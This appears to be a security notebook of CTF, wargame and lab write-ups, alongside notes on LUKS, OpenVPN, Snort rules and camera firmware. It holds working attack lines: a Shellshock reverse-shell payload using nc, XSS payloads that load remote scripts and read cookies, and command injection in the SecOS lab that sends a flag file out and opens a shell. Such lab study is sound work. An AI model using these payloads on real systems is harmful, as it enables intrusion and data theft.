#apt-get install cryptsetup
#luksformat -t ext4 /dev/sdb
#cryptsetup luksDump /dev/sdb
#cryptsetup open --type luks /dev/sdb luks
#mount /dev/mapper/luks /mnt/luks
#umount /mnt/luks
#cryptsetup close luks
# Encrypt with LUKS (Linux Unified Key Setup)
# Vortex wargame: Level 4
#ssh vortex4@vortex.labs.overthewire.org
$file /vortex/vortex4
$mkdir /tmp/v4
$cd /tmp/v4
$cat execve.c
$gcc -m32 -o execve execve.c
$cat getenvaddr.c
$gcc -m32 -o getenvaddr getenvaddr.c
$cat format_string.py
$gdb /vortex/vortex4
(gdb)set disassembly-flavor intel
(gdb)disassemble main
$readelf -r /vortex/vortex4
$./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`
$./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`
$./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo
%104 = init
$./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo
$whoami
$/bin/cat /etc/vortex_pass/vortex5
# NcN CTF 2k14: OST (400 points)
Can you hear it? We neither ;)
#cat pattern.py
#./pattern.py ost.wav
#cat solution.py
#./solution.py ost.wav output
#file output
#tesseract output flag && cat flag.txt
# NcN CTF 2k14: HIDDENtation (300 points)
Dig deep into the file and find the flag.
#file hiddentation
#./patch.py hiddentation r 0x0 0x280
#./luks_parser.py hiddentation
#cp hiddentation hiddentation.copy
#./patch.py hiddentation.copy w 0x3 53
#./patch.py hiddentation.copy w 0x220 00ac71f3
#./patch.py hiddentation.copy w 0x248 00000708
#./patch.py hiddentation.copy r 0x0 0x280
#file hiddentation.copy
#cryptsetup luksDump hiddentation.copy
#while read password; do echo $password; echo -n $password | cryptsetup open --type luks hiddentation.copy volume --key-file - && break; done <<< "`curl --silent http://whnt.com/2014/01/22/the-25-most-common-passwords-of-2013/ | grep '. ' | awk '{print $2}'`"
#fdisk -l /dev/mapper/volume
#gparted /dev/mapper/volume
## offset = 86016 (First sector) * 512 bytes/sector = 44040192
#losetup --offset 44040192 /dev/loop1 /dev/mapper/volume
#mount /dev/loop1 /mnt
#cat /mnt/flag.txt
#testdisk /dev/loop1
#dd if=/dev/loop1 of=ntfs skip=69632 count=34816
#umount /dev/loop1
#losetup -d /dev/loop1
#losetup /dev/loop1 ntfs
#mount /dev/loop1 /mnt
#cat /mnt/readme.txt
#umount /dev/loop1
#losetup -d /dev/loop1
#ntfsundelete --scan ntfs
#ntfsundelete --undelete --match flag.txt ntfs
#cat flag.txt*
#./rot.py -m tracks APAq986942o809qnn32n6987n7422771n53s59r5n1s02rq700ppr43p5196non749r 2>&1 | grep -e '\[' -e 13
References
http://testpurposes.net/2014/10/31/solucion-hiddentation-final-ctf-ncn-2014/
http://cryptsetup.googlecode.com/svn-history/r42/wiki/LUKS-standard/on-disk-format.pdf
# Wiener's attack against RSA (small values of d)
Wiener has proved that the attacker may efficiently find d when:
d < (N**0.25)/3
#cat wiener_attack.py
#./wiener_attack.py
Reference
http://en.wikipedia.org/wiki/Wiener's_attack
# NcN CTF Quals 2k14: eXPLicit (500 points)
#echo 0 > /proc/sys/kernel/randomize_va_space
#./explicit
#gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`
(gdb)set disassembly-flavor intel
(gdb)set follow-fork-mode child
(gdb)continue
#nc 127.0.0.1 7070
%n
^C
(gdb)backtrace
(gdb)x/2i 0x0804f96f-0x5
(gdb)quit
#gdb -q -p `ps axuf | grep explicit | head -n 1 | awk '{print $2}'`
(gdb)break *0x806ea80
(gdb)continue
#nc 127.0.0.1 7070
%n
(gdb)x/xw $esp
(gdb)quit
# ./checksec.sh --file explicit
# gdb -q -x rop.py
# readelf --section-headers explicit | grep '\.bss'
#cat exploit.py
#./exploit.py 127.0.0.1 7070 0xbffff59c
>
Another solution using mprotect (based on @esanfelix exploit)
#./search_instructions.py /eXPLicit/explicit mov+eax,0x3 int+0x80
# read
#./search_instructions.py /eXPLicit/explicit mov+eax,0x7d int+0x80
# mprotect
#gdb -q explicit
(gdb)x/10i 0x805ef4a
(gdb)x/10i 0x805fa30
#./search_instructions.py /eXPLicit/explicit pop pop pop ret
#cat exploit-mprotect.py
#./exploit-mprotect.py 127.0.0.1 7070 0xbffff59c
>
# CVE-2014-6271: Bash shellshock
Reverse shell PoC
- Vulnerable server
#a2enmod cgi
#sed -i 's/#Include conf-available\/serve-cgi-bin.conf/Include conf-available\/serve-cgi-bin.conf/' /etc/apache2/sites-available/000-default.conf
#service apache2 restart
#cat /usr/lib/cgi-bin/env.sh
- Client
#ip="192.168.1.1"
#nc -v --listen $ip --port=1234
#ip="192.168.1.1"
#payload="() { :; }; /bin/bash -c 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $ip 1234 > /tmp/f'"
#url="http://192.168.1.2/cgi-bin/env.sh"
#curl --verbose --user-agent "$payload" --referer "$payload" $url
$
Scripts
#cat cve-2014-6271-cmd
#./cve-2014-6271-cmd http 127.0.0.1 1580 cgi-bin/env.sh '/bin/uname -a'
Metasploit modules
msf >use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf >use exploits/multi/http/apache_mod_cgi_bash_env_exec
# Reverse TCP bind shell setting source port
SERVER#cat sc.asm
SERVER#nasm -f elf sc.asm && ld -o sc sc.o
CLIENT#nc -lv 127.0.0.1 1234
SERVER#./sc
hostname
exit
CLIENT#
# WAP Challenge 14: HTTP Traffic File Carving
#url='http://videos.pentesteracademy.com.s3.amazonaws.com/videos/wap-challenges/http-forensics2.pcap'
#wget --quiet --output-document=http-forensics2.pcapng $url
#editcap -F libpcap -T ether http-forensics2.pcapng http-forensics2.pcap
#tshark -nr http-forensics2.pcap | grep octet
#cat solution.py
#./solution.py
#cat split-file/pass
# Flashing WVC54GCA with a custom firmware
#file /sbin/init
#cat /etc/lsb-release | grep DESC
#mkdir wvc54gca
#cd wvc54gca
#wget http://downloads.linksysbycisco.com/downloads/wvc54gca_v1.00R24.tgz
#tar xvzf wvc54gca_v1.00R24.tgz
#md5sum wvc54gca_v1.00R24.tgz
#apt-get install autotools-dev libncurses5-dev
#rm /bin/sh
#ln -s /bin/bash /bin/sh
#cd source
#cat README
#cat src/rootfs/etc/init.d/rcS
#echo -e "\n# ---- Start Telnet Server (debug) ---- #\n/usr/sbin/telnetd &" >> src/rootfs/etc/init.d/rcS
#cat src/rootfs/etc/passwd
#openssl passwd -crypt toor
#sed -i 's/9szj4G6pgOGeA/TEcqq4feRqPLA/' src/rootfs/etc/passwd
#./makeall
#file FW/WVC54GCA.bin
# Timelapse with WVC54GCA (Linksys IP camera)
Video stream (no audio)
#vlc http://192.168.1.10/img/mjpeg.cgi
#vlc http://192.168.1.10/img/video.mjpeg
#vlc rtsp://192.168.1.10/img/video.sav
Video stream (audio)
# vlc http://192.168.1.10/img/video.asf
Snapshot
#wget --quiet --output-document=image.jpg 'http://192.168.1.10/img/mobile.cgi'
#wget --quiet --output-document=image.jpg 'http://192.168.1.10/img/snapshot.cgi?size=X&quality=Y'
- Size:
1 = 160×128
2 = 320×240
3 = 640×480
- Quality:
1 = Very high
2 = High
3 = Normal
4 = Low
5 = Very low
Timelapse
#cat timelapse.sh
#./timelapse.sh run
#./timelapse.sh make_video
Bonus
# cat cam.sh
# Snort rule structure and syntax
Overview
A rule is a specified set of keywords and arguments used as matching criteria to identify security policy violations.
The engine compares packets against the conditions specified in each rule.
If the packet data matches all the conditions specified in a rule, the rule is triggered.
The action field in the rule specifies what should be done next.
Rules contain two logical sections: the rule header and the rule body.
The rule header
Identifies how to match traffic based on the following criteria:
- Action
- Protocol
- Source IP
- Source port
- Operator
- Destination IP
- Destination port
Example:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
Note the use of variables; it makes rule management easier.
Action
The following actions are available in IDS mode:
- alert: Log the event and send an alert message to the output component.
- pass: Ignore the packet.
When your installation is deployed inline:
- Generate Events: Issues console alerts.
- Drop & Generate Events: Block and alert.
- Disabled: Prevents the rule from being enforced thus saving processing cycles.
Protocol
The following protocols are supported:
- TCP
- UDP
- ICMP
- IP
Source and Destination IPs
In all cases, the best practice is to use variables.
The system recognizes only IP addresses and will not accept hostnames.
You can specify:
- Any IP address, using the keyword 'any'.
- A single IP address.
- A list of IP addresses [192.168.1.1, 192.168.1.5].
- A range of IP addresses 192.168.1.0/24.
- The negation of IP addresses !192.168.1.10.
- A variable previously defined in the snort.conf file.
Source and Destination Ports
You can specify:
- Any port, using the keyword 'any'.
- A single port.
- A list of ports [21, 23, 80-90]
- A range of ports 80-443.
- The negation of ports !80
- A variable previously defined in the snort.conf file.
Operator: specifying direction
To indicate that a rule triggers against traffic:
- From the source IP to the destination IP, use the directional operator '->'.
- Between the source IP and the destination IP, use the bi-directional operator '<>'.
The rule body
This is where you can specifically drill into a packet and get the content that actually signals malicious or suspicious activity.
The entire body is enclosed in parentheses.
Rule options end in a semicolon (;).
An option is structured as a keyword followed by a colon (:), followed by one or multiple arguments. Arguments are separated by commas (,).
For example:
tag:session, 30, seconds;
Options that act on content apply to the argument string of the preceding content keyword.
For example:
content:"root"; nocase;
A rule can contain multiple content references. They are treated as an AND operation.
For example:
content:"username:"; nocase; content:"password:"; nocase;
Defining the event message
alert tcp any any -> $HOME_NET 23 \
(msg:"Suspicious Telnet!"; \
content:"root"; nocase; \
sid:1000000;)
Content matches
You can mix hexadecimal content and ASCII content.
content:"|90 90 90 E8 C0 FF FF FF|/bin/sh";
You can also negate or exclude content.
content:!"GET";
Constraining content matches
- nocase: To ignore the case in ASCII strings.
- offset: Allows you to specify where the detection engine should start searching for content within a packet (bytes).
- depth: The maximum search depth (bytes) from the offset value.
- distance: The detection engine starts searching for content matches after the specified number of bytes from the previous content match.
- within: The next content match must occur within the specified number of bytes after the end of the last content match, including the distance value.
Server flow
- to_client or from_server: Triggers on server responses.
- to_server or from_client: Triggers on client requests.
- established: Triggers on established TCP connections.
- stateless: Triggers regardless of the state of the stream processor.
- no_stream: Does not trigger on rebuilt stream packets.
- only_stream: Triggers only on rebuilt stream packets.
Snort ID option
Snort rules all have unique ID numbers.
Custom rules should use a number greater than 1000000.
Rule revision number
Lets you assign a revision number to a rule that you have edited.
Metadata
This is a required option for rules in the Sourcefire system.
You can embed additional information about a rule which other parts of the Snort engine can use.
For example:
metadata:service http;
metadata:impact_flag red;
Flags
To check if TCP flags are present:
F: FIN
S: SYN
R: RST
P: PSH
A: ACK
U: URG
1: Reserved bit 1
2: Reserved bit 2
0: No flags set
Use the following modifiers to change the match criteria:
+: Match on the specified bits plus any others.
*: Match if any of the specified bits are set.
!: Match if the specified bits are not set.
flags:[!|*|+]<FSRPAU120>[,<FSRPAU120>]
The optional parameter indicates the flag bits you wish to ignore.
file_data
Sets the cursor used for detection to one of the following buffers:
- When traffic is HTTP:
1. HTTP response body, without chunking/compression/normalization.
2. HTTP de-chunked response body.
3. HTTP normalized response body, when normalized javascript is turned on.
4. HTTP UTF normalized response body, when normalized utf is turned on.
5. All of the above.
- When traffic is SMTP/POP/IMAP:
1. SMTP/POP/IMAP data body, including email headers and MIME when decoding is turned off.
2. Base64 decoded MIME attachment, when b64_decode_depth is greater than -1.
3. Non-Encoded MIME attachment, when bitenc_decode_depth is greater than -1.
4. Quoted-Printable decoded MIME attachment, when qp_decode_depth is greater than -1.
5. Unix-to-unix decoded attachment, when uu_decode_depth is greater than -1.
detection_filter
Replaces the threshold keyword in a rule.
It defines a rate which must be exceeded by source/destination before a rule can generate an event.
It is evaluated as part of the detection phase, just after pattern matching.
Parameters:
- track by_src or track by_dst.
- count: the number of events.
- seconds: the time over which the count is measured.
For example:
detection_filter: track by_src, count 10, seconds 30;
The alert will trigger after 10 events are seen from each unique source IP within 30 seconds.
fast_pattern
By default, the longest content statement for each rule is placed into the fast pattern matching engine.
Only if this string is found in a packet, the remaining options in the rule are evaluated.
However, you have the ability to control which piece of content gets placed into the fast pattern matching engine with the fast_pattern rule option.
content:"jumanji"; fast_pattern;
fast_pattern:only: the content should only be used for the fast pattern matcher and not evaluated as a content rule option.
fast_pattern:<offset>,<length>: specify where the fast pattern matcher should look for the content.
flowbits
This rule option is used to set tags which can be referenced in subsequent rules.
Parameters:
- set: sets the specified state for the current flow.
- setx: sets the specified state exclusively.
- unset: unsets the specified states.
- toggle: inverts the specified state.
- isset: checks if the specified state is set.
- isnotset: checks if the specified state is not set.
- noalert: instructs to not generate an alert, regardless of the detection options.
- reset: resets the states on a given flow.
flowbits: [set|setx|unset|toggle|isset,isnotset,noalert,reset][,state_name][,group_name]
- state_name: the name that will be referred to in other rules when testing the flowbit.
- group_name: is used to associate multiple flowbits together.
byte_jump/test/extract
Gives the ability to seek information within a packet payload where the location of content is not necessarily known but can be obtained.
- byte_jump: moves the inspection pointer a number of bytes forward.
- byte_test: reads bytes and determines if they are less than, greater than, equal or not equal to a specified value.
- byte_extract: reads bytes and creates a variable that represents this value.
Case #1: Malformed GIF overflow
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any \ (msg:"FILE-IDENTIFY GIF file magic detected"; \ flow:to_client, established; \ file_data; \ content:"GIF8"; depth:4; fast_pattern; \ content:"a"; within:1; distance:1; \ flowbits:set,file.gif; flowbits:noalert; \ metadata:service http, service imap, service pop3; \ classtype:misc-activity; \ sid:20459; rev:8;)
file_data;
The search for this content starts at the beginning of the file buffer, not the payload.
flowbits:set,file.gif;
The file.gif flowbit is set.
metadata:service http, service imap, service pop3;
Using the Adaptive Profiles feature the rule is still enforced even though the $FILE_DATA_PORTS variable does not include non-standard ports.
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any \ (msg:"FILE-IMAGE Oracle Java Virtual Machine malformed GIF buffer overflow attempt"; \ flow:to_client,established; \ flowbits:isset,file.gif; \ file_data; \ content:"GIF"; \ byte_test:1,!&,128,7,relative; \ content:","; within:1; distance:10; \ content:"|00 00|"; within:2; distance:4; \ metadata:policy security-ips drop, service http, service imap, service pop3; \ reference:bugtraq,22085; reference:cve,2007-0243; \ classtype:attempted-user; \ sid:10062; rev:9;)
flowbits:isset,file.gif;
Checks if the file.gif flowbit is set.
byte_test:1,!&,128,7,relative;
Reads 1 byte at a location 7 bytes away from the DOE pointer's current location. DOE means Detect Offset End. The byte_test returns True if the logical AND between the byte and the mask (10000000b ~ 128d) is equal to 00000000b ~ False => !(False) = True. After this operation, the DOE pointer remains in the same position.
content:","; within:1; distance:10;
From the "GIF" match, after 10 bytes and within 1 byte, the value should be a comma.
content:"|00 00|"; within:2; distance:4;
From the "," match, after 4 bytes and within 2 bytes, the value should be 0x00 0x00.
Case #2: Windows Help Center escape sequence vulnerability
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any \ (msg:"OS_WINDOWS Microsoft Windows Help Center escape sequence XSS attempt"; \ flow:to_client,established; \ file_data; \ content:"hcp|3A 2F 2F|"; nocase; \ content:"script"; distance:0; nocase; \ content:"defer"; distance:0; nocase; \ pcre:"/hcp\x3a\x2f\x2f[^\n]*(\x3c|\x253c)script(\s|\x2520|\x2f)+defer/iO"; \ metadata:policy balanced-ips drop, policy security-ips drop, service http; \ reference:bugtraq,40725; \ reference:cve,2010-1885; \ reference:url,osvdb.org/show/osvdb/65264; \ reference:url,www.microsoft.com/technet/security/bulletin/MS10-042.mspx; \ classtype:attempted-user; \ sid:16665; rev:5;)
A distance:0 without a within simply tells the engine that the content match has to occur after the previous match, regardless of where in the packet.
The use of three content matches before the pcre evaluation speeds up the rule.
hcp\x3a\x2f\x2f[^\n]*
Search for hcp:// followed by any characters except "new line" up to the next regex match.
(\x3c|\x253c)script
Search for a "<" or a "%3c" before the "script" word.
(\s|\x2520|\x2f)+defer
Search for at least one "whitespace" (space, tab, newline, formfeed, linebreak, ...) or a "%20" or a "/" before the "defer" word.
iO
Two modifiers: i means case-insensitive and O forces the regex to be evaluated even if it is taking too long.
Case #3: The Kaminsky DNS vulnerability
alert udp $EXTERNAL_NET 53 -> $HOME_NET any \ (msg:"PROTOCOL-DNS large number of NXDOMAIN replies - possible DNS cache poisoning"; \ byte_test:1,&,2,3; \ byte_test:1,&,1,3; \ byte_test:1,&,128,2; \ detection_filter:track by_src, count 1200, seconds 30; \ metadata:service dns; \ reference:cve,2008-1447; \ reference:cve,2009-0233; \ reference:url,technet.microsoft.com/en-us/security/bulletin/MS09-008; \ reference:url,www.kb.cert.org/vuls/id/800113; \ classtype:misc-attack; \ sid:13948; rev:10;)
byte_test:1,&,2,3;
Reads 1 byte at a location 3 bytes away and returns True if the logical AND between the byte and the mask (00000010b ~ 2d) is not equal to 0.
byte_test:1,&,1,3;
Reads the previous byte again and returns True if the logical AND between the byte and the mask (00000001b ~ 1d) is not equal to 0.
byte_test:1,&,128,2;
Reads 1 byte at a location 2 bytes away and returns True if the logical AND between the byte and the mask (10000000b ~ 128d) is not equal to 0.
detection_filter:track by_src, count 1200, seconds 30;
Sets the threshold that must be met in order for the rule to trigger.
Case #4: The content option for overflow detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 4000 \ (msg:"SERVER-OTHER Alt-N SecurityGateway username buffer overflow attempt"; \ flow:to_server, established; \ content:"username=",nocase; \ isdataat:450,relative; \ content:!"|3B|"; within:450; \ content:!"|3A|"; within:450; \ content:!"&"; within:450; \ content:!"|0A|"; within:450; \ metadata:service http;\ policy connectivity-ips drop, policy security-ips drop; \ reference:cve,2008-4193; reference:url,secunia.com/advisories/30497/; \ classtype:attempted-admin; \ sid:13916; rev:9;)
isdataat:450,relative;
Verifies that there are 450 bytes after the end of the "username=" string.
Next, the engine verifies there is not a colon, semicolon, ampersand or linefeed within 450 bytes of the end of the "username=" string.
References
http://manual.snort.org
# SecuInside CTF Quals 2k14: Reversing - yayaya (100 points)
#xdotool getmouselocation
#while [ True ]; do import -window root -delay 0 -crop 400x388-0+112 `date +%d%m%y%H%M%S`-$RANDOM.png; sleep 0.1; done
#cat blend-point.py
#convert -crop 330x70+0+0 result.png flag.png
#xxd -p flag.png | tr -d '\n'
# SecuInside CTF Quals 2k14: Speed Game - Mic Check (7 points)
#./rot.py -m inline -d "Q2QnT29oUNW0wtWqySDbw2UhvRIkTRrby2Qdx2g0UOjbwCHoTRrpw3Ei"
#./rot.py -m tracks -d "Q2QnT29oUNW0wtWqySDbw2UhvRIkTRrby2Qdx2g0UOjbwCHoTRrpw3Ei"
# OpenVPN with x509 certificates
RSA key, CSR and DH parameter
#openssl genrsa -out server.key 2048
#openssl req -new -key server.key -out server.csr
#openssl genrsa -out client.key 2048
#openssl req -new -key client.key -out client.csr
#openssl dhparam -out dh2048.pem 2048
CA and signed certificates
#mkdir demoCA
#mkdir demoCA/private
#mkdir demoCA/newcerts
#echo '01' > demoCA/serial
#touch demoCA/index.txt
#openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650
#mv cakey.pem demoCA/private/.
#cp cacert.pem demoCA/.
#openssl ca -in server.csr
#openssl ca -in client.csr
#cp demoCA/newcerts/01.pem server.pem
#cp demoCA/newcerts/02.pem client.pem
OpenVPN server configuration
#cat openvpn_server.conf
#openvpn openvpn_server.conf
OpenVPN client configuration
#cat openvpn_client.conf
#openvpn openvpn_client.conf
OpenVPN Android client configuration - Import profile
#cat openvpn_client.ovpn
#Import openvpn_client.ovpn
# XSS game area
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
Level 2: Persistence is key
https://xss-game.appspot.com/level2/frame
post-content=<img src='foo' onerror='alert("xss")'>
post-content=<img src='foo' onerror='alert(document.cookie)'>
post-content=<img src='foo' onerror='s=document.createElement("script");s.src="//192.168.1.200/xss.js";document.body.appendChild(s)'>
Level 3: That sinking feeling...
https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level 4: Context matters
https://xss-game.appspot.com/level4/frame
timer=');alert('xss
Level 5: Breaking protocol
https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level 6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
URL=https://xss-game.appspot.com/level6/frame#Https://192.168.1.1/xss.js
URL=https://xss-game.appspot.com/level6/frame#//192.168.1.1/xss.js
Tools
#ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -lextifscgjm
#ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -XC
# skipfish -b i -I xss-game.appspot.com -X /css/,/img/ -Z -o report_dir -M -E -U https://xss-game.appspot.com
References
http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00
https://www.google.com/about/appsecurity/learning/xss/index.html
https://code.google.com/p/ratproxy/wiki/RatproxyDoc
https://code.google.com/p/skipfish/wiki/SkipfishDoc
# SecOS 1
ht#wget http://download.vulnhub.com/secos/SecOS-1.tar.gz
ht#md5sum SecOS-1.tar.gz
ht#tar xvzf SecOS-1.tar.gz
ht#virtualbox
<Run SecOS-1>
Grub solution
GNU GRUB *Ubuntue
init=/bin/bash
F10
root@(none):/#cat /root/flag.txt | grep -m 1 flag
root@(none):/#mount -o remount,rw /
root@(none):/#passwd root
<Reboot>
CSRF solution
ht#nmap 192.168.1.1
ht#curl --silent http://192.168.1.1:8081
ht#curl --silent http://192.168.1.1:8081/hint
ht#curl --silent --request POST --data 'username=user&password=pass' http://192.168.1.1:8081/sign-up
ht#curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass' http://192.168.1.1:8081/login
ht#curl --silent --cookie-jar uc --cookie uc http://192.168.1.1:8081/users
ht#curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message=http://192.168.1.2:8000/csrf.html' http://192.168.1.1:8081/send-message
ht#cat csrf.html
ht#python -m SimpleHTTPServer
ht#curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass' http://192.168.1.1:8081/login
ht#curl --silent --cookie-jar sc --cookie sc http://192.168.1.1:8081/messages | grep Well
ht#ssh spiderman@192.168.1.1
CrazyPassword!
spiderman@SecOS-1:~$crontab -e
spiderman@SecOS-1:~$ps axuf | grep sudo
spiderman@SecOS-1:~$cat /home/spiderman/vnwa/internalServer.js
spiderman@SecOS-1:~$curl --silent --request POST --data 'ip=-c 1 127.0.0.1; nc 192.168.1.2 1234 < /root/flag.txt' http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234 | grep -m 1 flag
spiderman@SecOS-1:~$function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }
spiderman@SecOS-1:~$encoded=`encode '-c 1 127.0.0.1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 1234 > /tmp/f'`
spiderman@SecOS-1:~$curl --silent --request POST --data "ip=$encoded" http://127.0.0.1:9000
ht#ncat -l 192.168.1.2 1234
#hostname
#whoami
# PicoCTF 2k13 - moreevil
#gdb -q -n -x moreevil.py
#gdb -q -n -x moreevil.py
#gdb moreevil
(gdb)set environment LD_PRELOAD=lib/hook64.so
(gdb)break *0x4021ee
(gdb)run
1234567890123456789
(gdb)x/152xb 0x6030c8
#ipython
In [1]:key = [0x19, 0x1e, 0x06, 0x51, 0x1d, 0x1e, 0x06, 0x51, 0x12, 0x10, 0x1f, 0x51, 0x08, 0x1e, 0x04, 0x51, 0x16, 0x1e, 0x4e]
In [2]:password = ''
In [3]:for byte in key: password += chr(byte ^ ord('q'))
In [4]:password
Out[4]: